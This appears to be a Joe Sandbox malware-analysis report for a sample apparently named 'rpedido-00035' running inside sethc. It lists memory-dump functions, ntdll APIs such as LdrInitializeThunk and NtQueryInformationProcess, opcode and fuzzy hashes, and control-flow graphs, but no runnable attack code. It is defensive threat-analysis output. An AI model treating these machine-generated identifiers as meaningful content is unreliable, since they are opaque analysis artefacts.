                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 36083439
                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 36083466
                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 3608344A, 36083476
                                                          • LdrpFindDllActivationContext, xrefs: 36083440, 3608346C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                          • API String ID: 3446177414-3779518884
                                                          • Opcode ID: 79560960faeb111b10ac6bd4295738d4ba36d5263e34956b681737369a3a7fed
                                                          • Instruction ID: 2e1db8202f2dda51fa7333241fa3b68c0063cd86901f4fd987de66116f0661b4
                                                          • Opcode Fuzzy Hash: 79560960faeb111b10ac6bd4295738d4ba36d5263e34956b681737369a3a7fed
                                                          • Instruction Fuzzy Hash: 933125B6E00356ABFB73FB05C847A19AEE4EB40394F4A88F6D50467150D7619C88CFE1
                                                          Function 36030AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • Failed to allocated memory for shimmed module list, xrefs: 36079F1C
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 36079F2E
                                                          • LdrpCheckModule, xrefs: 36079F24
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 3446177414-161242083
                                                          • Opcode ID: 6cf75085e6a9244c945809f288a5617e1bd2cf455026ed1669596e03ccbdf547
                                                          • Instruction ID: 57b4d64c9f7757734a1ca77596df9ab0a91fa3bcb37402249596189129812a02
                                                          • Opcode Fuzzy Hash: 6cf75085e6a9244c945809f288a5617e1bd2cf455026ed1669596e03ccbdf547
                                                          • Instruction Fuzzy Hash: 5071E474E112059FEB04DF68CE82AAEBBF5FF44308F2444A9E542EB251E7309D52CB95
                                                          Function 3603EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ac951d424330495919604508665f37bb41f8ec0e8eeecea4e658e80fb2574c7
                                                          • Instruction ID: 52ab54a956d2b765b2c909513c4bf923614eca0fe523bf4fd16bbe9b29eb32f1
                                                          • Opcode Fuzzy Hash: 5ac951d424330495919604508665f37bb41f8ec0e8eeecea4e658e80fb2574c7
                                                          • Instruction Fuzzy Hash: 38E1FFB4D01718CFEB24CFAAD981A8DBBF1FF48315F2045AAE555A7220DB70A881CF54
                                                          Function 360EA04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: bb4264cfbb486106921eacdb9fce4772918d314c919dacfbccf2a5c4b6e9002b
                                                          • Instruction ID: 853e9f249f3300875ad184c34b8a61162c9dd4f69de9509c7368bd0e8d8bf910
                                                          • Opcode Fuzzy Hash: bb4264cfbb486106921eacdb9fce4772918d314c919dacfbccf2a5c4b6e9002b
                                                          • Instruction Fuzzy Hash: 4C516F75B10A329FEB08CE59C8A2A19BBE1FB8D354B2041EDD506E7710DBB5EC51CB80
                                                          Function 36047A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                          • String ID:
                                                          • API String ID: 4281723722-0
                                                          • Opcode ID: f6b9ee07f6819fac97cec4d90227b0e7fc569142079e5a65b84ad967abe90c41
                                                          • Instruction ID: 833949c53c97df13e6ee8305caf09f738fb06f0601a31487a4e430b226697d56
                                                          • Opcode Fuzzy Hash: f6b9ee07f6819fac97cec4d90227b0e7fc569142079e5a65b84ad967abe90c41
                                                          • Instruction Fuzzy Hash: 94313475E00228DFDF05DFA8D986A9EBBF1FB48320F1041AAE611B7290CB755901CFA4
                                                          Function 3600DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: 0$0
                                                          • API String ID: 3446177414-203156872
                                                          • Opcode ID: 2822bae7e51a4f3c2afc8a66cc13909194fc2c61b93fc9b50fa741b7a01eaaf7
                                                          • Instruction ID: 7a074279fe1819f3b0c2e89a35a18b6d2600aee6bfb4de5f94071ba917e75dcb
                                                          • Opcode Fuzzy Hash: 2822bae7e51a4f3c2afc8a66cc13909194fc2c61b93fc9b50fa741b7a01eaaf7
                                                          • Instruction Fuzzy Hash: 8D418EB1A087019FE300CF29C845A5ABBE9BB88358F0085AEF588DB340D771E945CF96

                                                          Execution Graph

                                                          Execution Coverage:0.5%
                                                          Dynamic/Decrypted Code Coverage:71.4%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:14
                                                          Total number of Limit Nodes:2
                                                          execution_graph 69876 45029f0 LdrInitializeThunk 69877 43df033 69878 43df04d 69877->69878 69879 43df1c7 NtQueryInformationProcess 69878->69879 69880 43df201 69878->69880 69879->69880 69887 4502b20 69889 4502b2a 69887->69889 69890 4502b31 69889->69890 69891 4502b3f LdrInitializeThunk 69889->69891 69892 1b87cc 69895 1b8781 69892->69895 69893 1b87d7 69894 1b87a6 69895->69892 69895->69894 69897 4502e50 LdrInitializeThunk 69895->69897 69897->69893

                                                          Executed Functions

                                                          Function 043DF01D Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 549COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 43df01d-43df01f 1 43df035-43df04b 0->1 2 43df021-43df030 0->2 3 43df04d-43df064 call 43e1318 1->3 4 43df069-43df089 call 43e1338 call 43dd028 1->4 2->1 3->4 10 43df08f-43df198 call 43def58 call 43e1338 call 43e52a4 call 43d0398 call 43e08e8 call 43d0398 call 43e08e8 call 43e3008 4->10 11 43df686-43df691 4->11 28 43df19e-43df238 call 43d0398 call 43e08e8 NtQueryInformationProcess call 43e1338 call 43d0398 call 43e08e8 10->28 29 43df67a-43df681 call 43def58 10->29 41 43df24c-43df2c8 call 43e52b2 call 43d0398 call 43e08e8 28->41 42 43df23a-43df247 28->42 29->11 41->42 51 43df2ce-43df2dd call 43e52dc 41->51 42->29 54 43df2df-43df325 call 43e2028 51->54 55 43df32a-43df370 call 43d0398 call 43e08e8 call 43e3968 51->55 54->29 65 43df38f-43df48b call 43d0398 call 43e08e8 call 43e52ea call 43d0398 call 43e08e8 call 43e3328 call 43e12e8 * 3 call 43e52dc 55->65 66 43df372-43df38a 55->66 89 43df48d-43df4bc call 43e52dc call 43e12e8 call 43e533e call 43e52f8 65->89 90 43df4be-43df4d6 call 43e52dc 65->90 66->29 101 43df519-43df523 89->101 96 43df4d8-43df4fd call 43e2ad8 90->96 97 43df502-43df514 call 43e1f68 90->97 96->97 97->101 103 43df529-43df579 call 43d0398 call 43e08e8 call 43e3648 call 43e52dc 101->103 104 43df5f1-43df65a call 43d0398 call 43e08e8 call 43e3c88 101->104 123 43df5ae-43df5b5 103->123 124 43df57b-43df5a4 call 43e5388 call 43e533e 103->124 104->29 129 43df65c-43df671 104->129 126 43df5b7-43df5bf call 43e52dc 123->126 127 43df5c1-43df5cc 123->127 124->123 126->104 126->127 127->104 131 43df5ce-43df5ec call 43e3fa8 127->131 129->29 133 43df675 call 43e1318 129->133 131->104 133->29
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414385536.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_43d0000_sethc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: ce0e5c2a2c5e8f8b29aa1abfd81c8560697a5b17aaacde96a3c0e004d51ec75c
                                                          • Instruction ID: 2b5820d4a65ca5ec6e6af4c41d92d5489e8b73ae587110f0bbb71a22fcd2a8fe
                                                          • Opcode Fuzzy Hash: ce0e5c2a2c5e8f8b29aa1abfd81c8560697a5b17aaacde96a3c0e004d51ec75c
                                                          • Instruction Fuzzy Hash: 9D122A75518A8C9FDBA9EF68D8946EE77E1FF99308F00162AD84AC7240DF34A641CB41
                                                          Function 043DF028 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 197nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 138 43df028-43df04b 140 43df04d-43df064 call 43e1318 138->140 141 43df069-43df089 call 43e1338 call 43dd028 138->141 140->141 147 43df08f-43df198 call 43def58 call 43e1338 call 43e52a4 call 43d0398 call 43e08e8 call 43d0398 call 43e08e8 call 43e3008 141->147 148 43df686-43df691 141->148 165 43df19e-43df238 call 43d0398 call 43e08e8 NtQueryInformationProcess call 43e1338 call 43d0398 call 43e08e8 147->165 166 43df67a-43df681 call 43def58 147->166 178 43df24c-43df2c8 call 43e52b2 call 43d0398 call 43e08e8 165->178 179 43df23a-43df247 165->179 166->148 178->179 188 43df2ce-43df2dd call 43e52dc 178->188 179->166 191 43df2df-43df325 call 43e2028 188->191 192 43df32a-43df370 call 43d0398 call 43e08e8 call 43e3968 188->192 191->166 202 43df38f-43df48b call 43d0398 call 43e08e8 call 43e52ea call 43d0398 call 43e08e8 call 43e3328 call 43e12e8 * 3 call 43e52dc 192->202 203 43df372-43df38a 192->203 226 43df48d-43df4bc call 43e52dc call 43e12e8 call 43e533e call 43e52f8 202->226 227 43df4be-43df4d6 call 43e52dc 202->227 203->166 238 43df519-43df523 226->238 233 43df4d8-43df4fd call 43e2ad8 227->233 234 43df502-43df514 call 43e1f68 227->234 233->234 234->238 240 43df529-43df579 call 43d0398 call 43e08e8 call 43e3648 call 43e52dc 238->240 241 43df5f1-43df65a call 43d0398 call 43e08e8 call 43e3c88 238->241 260 43df5ae-43df5b5 240->260 261 43df57b-43df5a4 call 43e5388 call 43e533e 240->261 241->166 266 43df65c-43df671 241->266 263 43df5b7-43df5bf call 43e52dc 260->263 264 43df5c1-43df5cc 260->264 261->260 263->241 263->264 264->241 268 43df5ce-43df5ec call 43e3fa8 264->268 266->166 270 43df675 call 43e1318 266->270 268->241 270->166
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 043DF1E6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414385536.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_43d0000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID: 0
                                                          • API String ID: 1778838933-4108050209
                                                          • Opcode ID: 3a32441ab733e54e8015dc9e3498067a6e3816a6b313f4c8ffa3101e8eb2932b
                                                          • Instruction ID: 0cf9f949a92a0fdfea4293d661cd7d4acd367084dc5c253e6b755f9000632e29
                                                          • Opcode Fuzzy Hash: 3a32441ab733e54e8015dc9e3498067a6e3816a6b313f4c8ffa3101e8eb2932b
                                                          • Instruction Fuzzy Hash: BA613071914A8C9FEBA9EF68D8946EE7BF1FF98304F40162E944EC7250DF3491458B41
                                                          Function 043DF033 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 192nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 275 43df033-43df04b 276 43df04d-43df064 call 43e1318 275->276 277 43df069-43df089 call 43e1338 call 43dd028 275->277 276->277 283 43df08f-43df198 call 43def58 call 43e1338 call 43e52a4 call 43d0398 call 43e08e8 call 43d0398 call 43e08e8 call 43e3008 277->283 284 43df686-43df691 277->284 301 43df19e-43df1fc call 43d0398 call 43e08e8 NtQueryInformationProcess call 43e1338 283->301 302 43df67a-43df681 call 43def58 283->302 309 43df201-43df238 call 43d0398 call 43e08e8 301->309 302->284 314 43df24c-43df2c8 call 43e52b2 call 43d0398 call 43e08e8 309->314 315 43df23a-43df247 309->315 314->315 324 43df2ce-43df2dd call 43e52dc 314->324 315->302 327 43df2df-43df325 call 43e2028 324->327 328 43df32a-43df370 call 43d0398 call 43e08e8 call 43e3968 324->328 327->302 338 43df38f-43df48b call 43d0398 call 43e08e8 call 43e52ea call 43d0398 call 43e08e8 call 43e3328 call 43e12e8 * 3 call 43e52dc 328->338 339 43df372-43df38a 328->339 362 43df48d-43df4bc call 43e52dc call 43e12e8 call 43e533e call 43e52f8 338->362 363 43df4be-43df4d6 call 43e52dc 338->363 339->302 374 43df519-43df523 362->374 369 43df4d8-43df4fd call 43e2ad8 363->369 370 43df502-43df514 call 43e1f68 363->370 369->370 370->374 376 43df529-43df579 call 43d0398 call 43e08e8 call 43e3648 call 43e52dc 374->376 377 43df5f1-43df65a call 43d0398 call 43e08e8 call 43e3c88 374->377 396 43df5ae-43df5b5 376->396 397 43df57b-43df5a4 call 43e5388 call 43e533e 376->397 377->302 402 43df65c-43df671 377->402 399 43df5b7-43df5bf call 43e52dc 396->399 400 43df5c1-43df5cc 396->400 397->396 399->377 399->400 400->377 404 43df5ce-43df5ec call 43e3fa8 400->404 402->302 406 43df675 call 43e1318 402->406 404->377 406->302
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 043DF1E6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414385536.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_43d0000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID: 0
                                                          • API String ID: 1778838933-4108050209
                                                          • Opcode ID: b86f8229cc9629ab622a4de30dadbdc85ef068a1449fff79306d33f8f75beada
                                                          • Instruction ID: 5dda1bb80a782b0b13f307351d2ca0311998ea204b05eb655c5493af88b24031
                                                          • Opcode Fuzzy Hash: b86f8229cc9629ab622a4de30dadbdc85ef068a1449fff79306d33f8f75beada
                                                          • Instruction Fuzzy Hash: 2B512E71914A8C9FEBA9EF68D8946EE7BF1FF98308F40162E944EC7250DF3492458B41
                                                          Function 045034E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 48238022c89376aefd687f702892f5e8935b4f8b371c961de2ce2ee5dfab6a46
                                                          • Instruction ID: 08c399af83129a953e507c0ca024f5de279ee1208902e556ae50221a23a32073
                                                          • Opcode Fuzzy Hash: 48238022c89376aefd687f702892f5e8935b4f8b371c961de2ce2ee5dfab6a46
                                                          • Instruction Fuzzy Hash: 3690023160510412F51071584624706204597D0245F61CC15A0415569DC7A5D95675A2
                                                          Function 04502C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 422 4502c30-4502c3c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d68f87ad198fb531767e24ce14d3b2f5bd86ff666e928207ba013b44c26c4f66
                                                          • Instruction ID: 2b0381aa7f583e58419809d3e0a715dd70a8e34ab581f6d54250a63594bcda69
                                                          • Opcode Fuzzy Hash: d68f87ad198fb531767e24ce14d3b2f5bd86ff666e928207ba013b44c26c4f66
                                                          • Instruction Fuzzy Hash: 0A90022921300012F5907158551860A104597D1246F91DC19A0006559CCA25D86E7321
                                                          Function 04502CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 423 4502cf0-4502cfc LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 005c36ea88379df309f1fa185000f5c2713cef0e7d4355b528818ef90b3a6b27
                                                          • Instruction ID: a085a8fb2dd8698b07698f95f5742a9259d10f1e91bcc0065f8b85d8e218aa75
                                                          • Opcode Fuzzy Hash: 005c36ea88379df309f1fa185000f5c2713cef0e7d4355b528818ef90b3a6b27
                                                          • Instruction Fuzzy Hash: FF900221242041627955B15845145075046A7E0285791C816A1405951CC636E85BF621
                                                          Function 04502D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 424 4502d10-4502d1c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 39322116d238619a17ccb3f8bc13b4cd9e33893f134497d40b8bbba9fb8b2f83
                                                          • Instruction ID: 0b6a35b0a3f75244bbda63e29d5bc4e41ceb4373b24cdd066c0fc809dacea7c2
                                                          • Opcode Fuzzy Hash: 39322116d238619a17ccb3f8bc13b4cd9e33893f134497d40b8bbba9fb8b2f83
                                                          • Instruction Fuzzy Hash: 5290023120100423F52171584614707104997D0285F91CC16A0415559DD766D957B121
                                                          Function 04502E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 425 4502e50-4502e5c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3774264d1fb2dc5d275a5009fc901c3138b337bb80fde9340d99d2be6ca9715a
                                                          • Instruction ID: 9877fca1a1672aeea89775037f9c612fe25f50aa3427d6105f49456b6db111b9
                                                          • Opcode Fuzzy Hash: 3774264d1fb2dc5d275a5009fc901c3138b337bb80fde9340d99d2be6ca9715a
                                                          • Instruction Fuzzy Hash: 1690026134100452F51071584524B061045D7E1345F51C819E1055555DC729DC577126
                                                          Function 04502F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 31247f94202e98dbab03775b8757b0dae0838ccf2dc350339037ca604540f769
                                                          • Instruction ID: 96675bc9015238f1fedb191fd06759426d782fea3def32f994dd0aabef47cacc
                                                          • Opcode Fuzzy Hash: 31247f94202e98dbab03775b8757b0dae0838ccf2dc350339037ca604540f769
                                                          • Instruction Fuzzy Hash: A490022121180052F61075684D24B07104597D0347F51C919A0145555CCA25D8667521
                                                          Function 045029F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 415 45029f0-45029fc LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 72312af11de18fb6dec8163a039a345581d6693def34e933627306c0c111dc3f
                                                          • Instruction ID: 2a29681d0b6fe8de7b76d8994e4426e1911f0193b5d16fa3f5a71ac8b87b197c
                                                          • Opcode Fuzzy Hash: 72312af11de18fb6dec8163a039a345581d6693def34e933627306c0c111dc3f
                                                          • Instruction Fuzzy Hash: 72900225211000133515B5580714507108697D5395351C825F1006551CD731D8667121
                                                          Function 04502A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 416 4502a80-4502a8c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d0a3162d176abf51346eaec85acefe63167caf50245c13829053bd167211e82d
                                                          • Instruction ID: 98384e92d4797c9ffb783deb06daab96bd5d55fb31f1422fceac8e2d3bde5987
                                                          • Opcode Fuzzy Hash: d0a3162d176abf51346eaec85acefe63167caf50245c13829053bd167211e82d
                                                          • Instruction Fuzzy Hash: 1990026120200013751571584524616504A97E0245B51C825E1005591DC635D8967125
                                                          Function 04502B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 418 4502b10-4502b1c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: bba90090b817275b960650ed5eb49d642f19f24f927efa7cd987ff0c5cb758cd
                                                          • Instruction ID: c86f9789e3e67166976650d8dd4aa4541cca460fe2466ec1b1566555765b7957
                                                          • Opcode Fuzzy Hash: bba90090b817275b960650ed5eb49d642f19f24f927efa7cd987ff0c5cb758cd
                                                          • Instruction Fuzzy Hash: 8B90023120100812F5907158451464A104597D1345F91C819A0016655DCB25DA5E77A1
                                                          Function 04502B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 417 4502b00-4502b0c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
